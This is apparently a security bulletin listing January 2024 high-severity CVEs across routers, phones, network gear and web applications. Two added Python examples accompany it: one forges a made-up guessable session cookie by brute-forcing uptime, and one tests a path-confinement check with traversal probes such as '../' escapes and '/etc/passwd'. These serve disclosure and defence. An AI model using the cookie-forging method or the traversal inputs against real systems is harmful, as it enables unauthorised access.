gl-inet -- gl-ax1800_firmwareAn issue was discovered on GL.iNet devices before version 4.5.0. There is an NGINX authentication bypass via Lua string pattern matching. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.2024-01-129.8CVE-2023-50919
cve@mitre.org
go_git -- go_gitA denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients. Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability. This is a go-git implementation issue and does not affect the upstream git cli.2024-01-127.5CVE-2023-49568
cve-requests@bitdefender.com
go_git -- go_gitA path traversal vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to create and amend files across the filesystem. In the worst-case scenario, remote code execution could be achieved. Applications are only affected if they are using ChrootOS (https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS), which is the default when using the "Plain" versions of the Open and Clone funcs (e.g. PlainClone). Applications using BoundOS (https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS) or in-memory filesystems are not affected by this issue. This is a go-git implementation issue and does not affect the upstream git CLI.2024-01-129.8CVE-2023-49569
cve-requests@bitdefender.com
hancom -- hcellBuffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Hancom HCell on Windows allows Overflow Buffers. This issue affects HCell: 12.0.0.893.2024-01-128.8CVE-2023-40250
vuln@krcert.or.kr
haokekeji -- yiqiniuA vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652.2024-01-137.3CVE-2024-0510
cna@vuldb.com
hecheng -- leadshopA vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.2024-01-197.3CVE-2024-0739
cna@vuldb.com
hongdian -- h8951-4g-esp_firmwareRoot user password is hardcoded into the device and cannot be changed in the user interface.2024-01-129.8CVE-2023-49253
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe router console is accessible without authentication via the "data" field, and while a user needs to be logged in in order to modify the configuration, the session state is shared. If any other user is currently logged in, the anonymous user can execute commands in the context of the authenticated one. If the logged-in user has administrative privileges, it is possible to use webadmin service configuration commands to create a new admin user with a chosen password.2024-01-129.8CVE-2023-49255
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe authentication mechanism can be bypassed by overflowing the value of the Cookie "authentication" field, provided there is an active user session.2024-01-129.8CVE-2023-49262
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareAuthenticated user can execute arbitrary commands in the context of the root user by providing payload in the "destination" field of the network test tools. This is similar to the vulnerability CVE-2021-28151 mitigated on the user interface level by blacklisting characters with JavaScript, however, it can still be exploited by sending POST requests directly.2024-01-128.8CVE-2023-49254
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareAn authenticated user is able to upload an arbitrary CGI-compatible file using the certificate upload utility and execute it with the root user privileges.2024-01-128.8CVE-2023-49257
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareIt is possible to download the configuration backup without authorization and decrypt the included passwords using a hardcoded static key.2024-01-127.5CVE-2023-49256
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe authentication cookies are generated using an algorithm based on the username, a hardcoded secret and the device uptime, and can be guessed in a reasonable time.2024-01-127.5CVE-2023-49259
cvd@cert.pl
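The guessable-cookie class in the entry above, as an added example that is not Hongdian's code and does not reproduce the device's actual algorithm: the bulletin only says the cookie derives from the username, a hardcoded secret and the uptime, so the SHA-256 construction, the field order, whole-second uptime and the `FIRMWARE_SECRET` value are assumptions. The attacker model is that the secret has been pulled from the firmware image, leaving the uptime at login as the only unknown, bounded by how long a router is plausibly up. The `SessionStore` alongside it is the hardened shape: a random token with no derivable relation to anything the attacker knows.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Added example, not Hongdian code. The bulletin says the cookie is derived from the
# username, a hardcoded secret and the uptime; the construction below (SHA-256 over
# the three fields, uptime in whole seconds, the FIRMWARE_SECRET value) is an
# assumption chosen to show why any scheme of that shape can be guessed.

FIRMWARE_SECRET = b"assumed-constant-baked-into-the-image"


def weak_cookie(username: str, uptime_s: int) -> str:
    """Deterministic: the same user logging in at the same uptime second gets the
    same cookie, and nothing in it is unknown to someone holding the firmware."""
    data = username.encode() + FIRMWARE_SECRET + str(uptime_s).encode()
    return hashlib.sha256(data).hexdigest()


def recover_uptime(username: str, observed: str, max_uptime_s: int) -> Tuple[Optional[int], int]:
    """Attacker model: username known (e.g. 'admin'), secret extracted from the
    firmware, uptime bounded by how long the device has plausibly been up.
    Returns (uptime_found, hashes_computed)."""
    for t in range(max_uptime_s + 1):
        if hmac.compare_digest(weak_cookie(username, t), observed):
            return t, t + 1
    return None, max_uptime_s + 1


class SessionStore:
    """Hardened replacement: the cookie is 256 bits from the OS CSPRNG and means
    nothing except as a key into server-side state. There is no secret to extract
    and no low-entropy input to enumerate."""

    def __init__(self) -> None:
        self._sessions: dict = {}

    def issue(self, username: str) -> str:
        token = secrets.token_hex(32)
        self._sessions[token] = username
        return token

    def lookup(self, token: str) -> Optional[str]:
        return self._sessions.get(token)


def demo(max_uptime_days: int = 7) -> dict:
    """Constructed scenario: admin logged in 1 day, 10 h and 17 min after boot."""
    real_uptime = 1 * 86400 + 10 * 3600 + 17 * 60
    observed = weak_cookie("admin", real_uptime)
    found, attempts = recover_uptime("admin", observed, max_uptime_days * 86400)

    store = SessionStore()
    token = store.issue("admin")
    return {
        "recovered_uptime": found,
        "hashes_needed": attempts,
        "forged_cookie_valid": found is not None and weak_cookie("admin", found) == observed,
        "strong_token_bits": len(token) * 4,
        "strong_lookup": store.lookup(token),
        "strong_random_guess": store.lookup(secrets.token_hex(32)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With a seven-day uptime bound the search is about 600k SHA-256 evaluations, which finishes in well under a minute on a laptop; widening the bound to a year only multiplies that by ~50. The random token has a 2^256 search space and the same attacker gains nothing from the firmware.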
hongdian -- h8951-4g-esp_firmwareThe "tokenKey" value used in user authorization is visible in the HTML source of the login page.2024-01-127.5CVE-2023-49261
cvd@cert.pl
horner_automation -- cscapeIn Horner Automation Cscape versions 9.90 SP10 and prior, local attackers are able to exploit this vulnerability if a user opens a malicious CSP file, which would result in execution of arbitrary code on affected installations of Cscape.2024-01-157.8CVE-2023-7206
ics-cert@hq.dhs.gov
huawei -- emuiComponent exposure vulnerability in the Wi-Fi module. Successful exploitation of this vulnerability may affect service availability and integrity.2024-01-169.1CVE-2023-52101
psirt@huawei.com
huawei -- emuiBuffer overflow vulnerability in the FLP module. Successful exploitation of this vulnerability may cause out-of-bounds read.2024-01-169.8CVE-2023-52103
psirt@huawei.com
huawei -- emuiOut-of-bounds access vulnerability in the device authentication module. Successful exploitation of this vulnerability may affect confidentiality.2024-01-167.5CVE-2023-44112
psirt@huawei.com
huawei -- emuiVulnerability of trust relationships being inaccurate in distributed scenarios. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-44117
psirt@huawei.com
huawei -- emuiVulnerability of trust relationships being inaccurate in distributed scenarios. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-4566
psirt@huawei.com
huawei -- emuiDenial of Service (DoS) vulnerability in the DMS module. Successful exploitation of this vulnerability will affect availability.2024-01-167.5CVE-2023-52098
psirt@huawei.com
huawei -- emuiVulnerability of foreground service restrictions being bypassed in the NMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52099
psirt@huawei.com
huawei -- emuiVulnerability of parameters being not verified in the WMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52102
psirt@huawei.com
huawei -- emuiVulnerability of parameters being not verified in the WMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52104
psirt@huawei.com
huawei -- emuiVulnerability of permissions being not strictly verified in the WMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52107
psirt@huawei.com
huawei -- emuiVulnerability of process priorities being raised in the ActivityManagerService module. Successful exploitation of this vulnerability will affect availability.2024-01-167.5CVE-2023-52108
psirt@huawei.com
huawei -- emuiVulnerability of trust relationships being inaccurate in distributed scenarios. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52109
psirt@huawei.com
huawei -- emuiAuthorization vulnerability in the BootLoader module. Successful exploitation of this vulnerability may affect service integrity.2024-01-167.5CVE-2023-52111
psirt@huawei.com
huawei -- emuilaunchAnyWhere vulnerability in the ActivityManagerService module. Successful exploitation of this vulnerability will affect availability.2024-01-167.5CVE-2023-52113
psirt@huawei.com
huawei -- emuiData confidentiality vulnerability in the ScreenReader module. Successful exploitation of this vulnerability may affect service integrity.2024-01-167.5CVE-2023-52114
psirt@huawei.com
huawei -- emuiPermission management vulnerability in the multi-screen interaction module. Successful exploitation of this vulnerability may cause service exceptions of the device.2024-01-167.5CVE-2023-52116
psirt@huawei.com
huawei -- harmonyosThe DownloadProviderMain module has a vulnerability in API permission verification. Successful exploitation of this vulnerability may affect integrity and availability.2024-01-169.1CVE-2023-52106
psirt@huawei.com
huawei -- harmonyosThe Celia Keyboard module has a vulnerability in access control. Successful exploitation of this vulnerability may affect availability.2024-01-167.5CVE-2023-52100
psirt@huawei.com
huawei -- harmonyosThe nearby module has a privilege escalation vulnerability. Successful exploitation of this vulnerability may affect availability.2024-01-167.5CVE-2023-52105
psirt@huawei.com
huawei -- harmonyosThe sensor module has an out-of-bounds access vulnerability. Successful exploitation of this vulnerability may affect availability.2024-01-167.5CVE-2023-52110
psirt@huawei.com
huawei -- harmonyosThe iaware module has a Use-After-Free (UAF) vulnerability. Successful exploitation of this vulnerability may affect the system functions.2024-01-167.5CVE-2023-52115
psirt@huawei.com
human_resource_integrated_system -- human_resource_integrated_systemA vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability.2024-01-129.8CVE-2024-0469
cna@vuldb.com
human_resource_integrated_system -- human_resource_integrated_systemA vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575.2024-01-129.8CVE-2024-0470
cna@vuldb.com
human_resource_integrated_system -- human_resource_integrated_systemA vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576.2024-01-129.8CVE-2024-0471
cna@vuldb.com
hypr -- workforce_accessImproper Input Validation vulnerability in HYPR Workforce Access on Windows allows Path Traversal. This issue affects Workforce Access: before 8.7.2024-01-167CVE-2023-5097
security@hypr.com
hypr -- workforce_accessImproper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on MacOS allows User-Controlled Filename. This issue affects Workforce Access: before 8.7.2024-01-167.2CVE-2023-6336
security@hypr.com
ibm -- app_connect_enterpriseIBM App Connect Enterprise 11.0.0.1 through 11.0.0.24 and 12.0.1.0 through 12.0.11.0 could allow a remote attacker to obtain sensitive information or cause a denial of service due to improper restriction of excessive authentication attempts. IBM X-Force ID: 279143.2024-01-189.1CVE-2024-22317
psirt@us.ibm.com
ibm -- openpages_with_watsonIBM OpenPages with Watson 8.3 and 9.0 could allow a remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005.2024-01-198.8CVE-2023-40683
psirt@us.ibm.com
intel -- intel_hotkey_services_for_windows_10_for_intel_nuc_p14e_laptop_element_software_installersImproper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access.2024-01-197.3CVE-2023-32544
secure@intel.com
intel -- intel_nuc_8_compute_element_bios_firmwareImproper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-42766
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-28738
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-28743
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-29495
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-38587
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-42429
secure@intel.com
intel -- intel_nuc_pro_software_suite_configuration_tool_software_installersUncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access.2024-01-197.9CVE-2023-32272
secure@intel.com
intumit_inc. -- smartrobotIntumit Inc. SmartRobot's web framework has a remote code execution vulnerability. An unauthorized remote attacker can exploit this vulnerability to execute arbitrary commands on the remote server.2024-01-159.8CVE-2024-0552
twcert@cert.org.tw
ivanti -- connect_secureA command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.2024-01-129.1CVE-2024-21887
support@hackerone.com
ivanti -- connect_secureAn authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.2024-01-128.2CVE-2023-46805
support@hackerone.com
judging_management_system -- judging_management_systemSQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via sub_event_id parameter in sub_event_stat_update.php.2024-01-129.8CVE-2023-30014
cve@mitre.org
judging_management_system -- judging_management_systemSQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via txtsearch parameter in review_search.php.2024-01-129.8CVE-2023-30015
cve@mitre.org
judging_management_system -- judging_management_systemSQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via sub_event_id parameter in sub_event_details_edit.php.2024-01-129.8CVE-2023-30016
cve@mitre.org
juniper -- junosAn Out-of-bounds Write vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS), or Remote Code Execution (RCE) and obtain root privileges on the device. This issue is caused by use of an insecure function allowing an attacker to overwrite arbitrary memory. This issue affects Juniper Networks Junos OS SRX Series and EX Series: * Junos OS versions earlier than 20.4R3-S9; * Junos OS 21.2 versions earlier than 21.2R3-S7; * Junos OS 21.3 versions earlier than 21.3R3-S5; * Junos OS 21.4 versions earlier than 21.4R3-S5; * Junos OS 22.1 versions earlier than 22.1R3-S4; * Junos OS 22.2 versions earlier than 22.2R3-S3; * Junos OS 22.3 versions earlier than 22.3R3-S2; * Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3.2024-01-129.8CVE-2024-21591
sirt@juniper.net
juniper -- junosAn Improper Validation of Syntactic Correctness of Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). If an attacker sends high rate of specific ICMP traffic to a device with VXLAN configured, this causes a deadlock of the PFE and results in the device becoming unresponsive. A manual restart will be required to recover the device. This issue only affects EX4100, EX4400, EX4600, QFX5000 Series devices. This issue affects: Juniper Networks Junos OS * 21.4R3 versions earlier than 21.4R3-S4; * 22.1R3 versions earlier than 22.1R3-S3; * 22.2R2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2; * 23.1 versions earlier than 23.1R2.2024-01-127.5CVE-2024-21595
sirt@juniper.net
juniper -- junosAn Exposure of Resource to Wrong Sphere vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the intended access restrictions. In an Abstracted Fabric (AF) scenario if routing-instances (RI) are configured, specific valid traffic destined to the device can bypass the configured lo0 firewall filters as it's received in the wrong RI context. This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2.2024-01-127.5CVE-2024-21597
sirt@juniper.net
juniper -- junosA Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). In a remote access VPN scenario, if a "tcp-encap-profile" is configured and a sequence of specific packets is received, a flowd crash and restart will be observed. This issue affects Juniper Networks Junos OS on SRX Series: * All versions earlier than 20.4R3-S8; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3.2024-01-127.5CVE-2024-21606
sirt@juniper.net
juniper -- junosA Missing Release of Memory after Effective Lifetime vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). In a Juniper Flow Monitoring (jflow) scenario route churn that causes BGP next hops to be updated will cause a slow memory leak and eventually a crash and restart of rpd. Thread level memory utilization for the areas where the leak occurs can be checked using the below command: user@host> show task memory detail | match so_in so_in6 28 32 344450 11022400 344760 11032320 so_in 8 16 1841629 29466064 1841734 29467744 This issue affects: Junos OS * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Junos OS Evolved * 21.4-EVO versions earlier than 21.4R3-EVO; * 22.1-EVO versions earlier than 22.1R3-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO. This issue does not affect: Juniper Networks Junos OS versions earlier than 21.4R1. Juniper Networks Junos OS Evolved versions earlier than 21.4R1.2024-01-127.5CVE-2024-21611
sirt@juniper.net
juniper -- junosAn Improper Check for Unusual or Exceptional Conditions vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based, unauthenticated attacker to cause rpd to crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when NETCONF and gRPC are enabled, and a specific query is executed via Dynamic Rendering (DREND), rpd will crash and restart. Continuous execution of this specific query will cause a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS * 22.2 versions earlier than 22.2R2-S2, 22.2R3; * 22.3 versions earlier than 22.3R2, 22.3R3. Juniper Networks Junos OS Evolved * 22.2 versions earlier than 22.2R2-S2-EVO, 22.2R3-EVO; * 22.3 versions earlier than 22.3R2-EVO, 22.3R3-EVO. This issue does not affect Juniper Networks: Junos OS versions earlier than 22.2R1; Junos OS Evolved versions earlier than 22.2R1-EVO.2024-01-127.5CVE-2024-21614
sirt@juniper.net
juniper -- junosAn Improper Validation of Syntactic Correctness of Input vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On all Junos OS MX Series and SRX Series platforms, when SIP ALG is enabled, and a specific SIP packet is received and processed, NAT IP allocation fails for genuine traffic, which causes Denial of Service (DoS). Continuous receipt of this specific SIP ALG packet will cause a sustained DoS condition. NAT IP usage can be monitored by running the following command. user@srx> show security nat resource-usage source-pool <source_pool_name> Pool name: source_pool_name .. Address Factor-index Port-range Used Avail Total Usage X.X.X.X 0 Single Ports 50258 52342 62464 96% <<<<< - Alg Ports 0 2048 2048 0% This issue affects: Juniper Networks Junos OS on MX Series and SRX Series * All versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.2024-01-127.5CVE-2024-21616
sirt@juniper.net
juniper -- junos_os_evolvedA NULL Pointer Dereference vulnerability in Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a specific IPv4 UDP packet is received and sent to the Routing Engine (RE) packetio crashes and restarts which causes a momentary traffic interruption. Continued receipt of such packets will lead to a sustained DoS. This issue does not happen with IPv6 packets. This issue affects Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L: * 21.4-EVO versions earlier than 21.4R3-S6-EVO; * 22.1-EVO versions earlier than 22.1R3-S5-EVO; * 22.2-EVO versions earlier than 22.2R2-S1-EVO, 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions earlier than 21.4R1-EVO.2024-01-127.5CVE-2024-21602
sirt@juniper.net
juniper -- junos_os_evolvedAn Allocation of Resources Without Limits or Throttling vulnerability in the kernel of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a high rate of specific valid packets are processed by the routing engine (RE) this will lead to a loss of connectivity of the RE with other components of the chassis and thereby a complete and persistent system outage. Please note that a carefully designed lo0 firewall filter will block or limit these packets which should prevent this issue from occurring. The following log messages can be seen when this issue occurs: <host> kernel: nf_conntrack: nf_conntrack: table full, dropping packet This issue affects Juniper Networks Junos OS Evolved: * All versions earlier than 20.4R3-S7-EVO; * 21.2R1-EVO and later versions; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S2-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO; * 22.4-EVO versions earlier than 22.4R2-EVO.2024-01-127.5CVE-2024-21604
sirt@juniper.net
juniper -- junos_os_evolvedAn Improper Handling of Syntactically Invalid Structure vulnerability in the Object Flooding Protocol (OFP) service of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On all Junos OS Evolved platforms, when specific TCP packets are received on an open OFP port, the OFP crashes, leading to a restart of the Routing Engine (RE). Continuous receipt of these specific TCP packets will lead to a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS Evolved * All versions earlier than 21.2R3-S7-EVO; * 21.3 versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-EVO; * 22.4 versions earlier than 22.4R2-EVO, 22.4R3-EVO.2024-01-127.5CVE-2024-21612
sirt@juniper.net
juniper -- paragon_active_assurance_control_centerAn Improper Access Control vulnerability in the Juniper Networks Paragon Active Assurance Control Center allows an unauthenticated network-based attacker to access reports without authenticating, potentially containing sensitive configuration information. A feature was introduced in version 3.1.0 of the Paragon Active Assurance Control Center which allows users to selectively share account data. By exploiting this vulnerability, it is possible to access reports without being logged in, resulting in the opportunity for malicious exfiltration of user data. Note that the Paragon Active Assurance Control Center SaaS offering is not affected by this issue. This issue affects Juniper Networks Paragon Active Assurance versions 3.1.0, 3.2.0, 3.2.2, 3.3.0, 3.3.1, 3.4.0. This issue does not affect Juniper Networks Paragon Active Assurance versions earlier than 3.1.0.2024-01-127.5CVE-2024-21589
sirt@juniper.net
jupyter-lsp -- jupyterlab-lspjupyter-lsp is a coding assistance tool for JupyterLab (code navigation + hover suggestions + linters + autocompletion + rename) using Language Server Protocol. Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory. This issue has been patched in version 2.2.2 and all users are advised to upgrade. Users unable to upgrade should uninstall jupyter-lsp.2024-01-187.3CVE-2024-22415
security-advisories@github.com
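The go-git ChrootOS traversal (CVE-2023-49569 above) and the jupyter-lsp entry describe the same failure: a root-confined filesystem that does not actually confine. The following added example is not code from go-git, go-billy or jupyter-lsp; `confine`, `demo` and the temporary directory layout are this example's own. It shows the check such a wrapper needs, applied to the resolved path rather than to the literal string, so that `..`, absolute inputs and symlinks that already point outside the root are all caught:

```python
import os
import tempfile
from pathlib import Path

# Added example, not go-git, go-billy or jupyter-lsp code. `confine` is the check a
# root-confined filesystem wrapper must perform; `demo` builds a throwaway tree
# (all names below are this example's own) and probes it.


class PathEscapeError(ValueError):
    """Raised when a requested path would resolve outside the root."""


def confine(root: str, untrusted: str) -> str:
    """Return the absolute path of `untrusted` inside `root`, or raise.

    The comparison is done on the resolved path (symlinks followed), because a
    lexical check for ".." misses a symlink inside the root that already points
    outside it, and because os.path.join() silently discards the root when the
    untrusted part is absolute.
    """
    root_real = os.path.realpath(root)
    if os.path.isabs(untrusted):
        raise PathEscapeError(f"absolute path not allowed: {untrusted!r}")
    candidate = os.path.realpath(os.path.join(root_real, untrusted))
    # commonpath compares whole components, so /srv/repo2 is not inside /srv/repo.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathEscapeError(f"{untrusted!r} resolves to {candidate}, outside {root_real}")
    return candidate


def demo() -> dict:
    """Constructed tree: a root with one real file and a symlink that escapes, plus a
    sibling directory holding a file the root must never reach. Returns a verdict
    per probe so the behaviour can be checked rather than only printed."""
    outside = tempfile.mkdtemp(prefix="outside-")
    root = tempfile.mkdtemp(prefix="repo-")
    Path(outside, "secret.txt").write_text("should be unreachable\n")
    Path(root, "docs").mkdir()
    Path(root, "docs", "readme.md").write_text("hello\n")
    os.symlink(outside, os.path.join(root, "link_out"))

    probes = [
        "docs/readme.md",                                    # legitimate
        "docs/../docs/readme.md",                            # odd, but stays inside
        "../" + os.path.basename(outside) + "/secret.txt",   # classic traversal
        "/etc/passwd",                                       # absolute path
        "link_out/secret.txt",                               # escape through a symlink
    ]
    verdicts = {}
    for probe in probes:
        try:
            confine(root, probe)
            verdicts[probe] = "allowed"
        except PathEscapeError:
            verdicts[probe] = "rejected"
    return verdicts


if __name__ == "__main__":
    for probe, verdict in demo().items():
        print(f"{verdict:8s} {probe}")
```

The symlink probe is the one a string-only check misses: `link_out/secret.txt` contains no `..` and is not absolute, yet it resolves outside the root. A wrapper that wants to forbid symlink following entirely, rather than merely confine it, has to open components with `O_NOFOLLOW` or an equivalent rather than rely on `realpath`.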
jupyterlab -- jupyterlabJupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix.2024-01-197.6CVE-2024-22421
security-advisories@github.com
kashipara -- billing_softwareA vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability.2024-01-139.8CVE-2024-0492
cna@vuldb.com
kashipara -- billing_softwareA vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability.2024-01-139.8CVE-2024-0493
cna@vuldb.com
kashipara -- billing_softwareA vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599.2024-01-139.8CVE-2024-0494
cna@vuldb.com
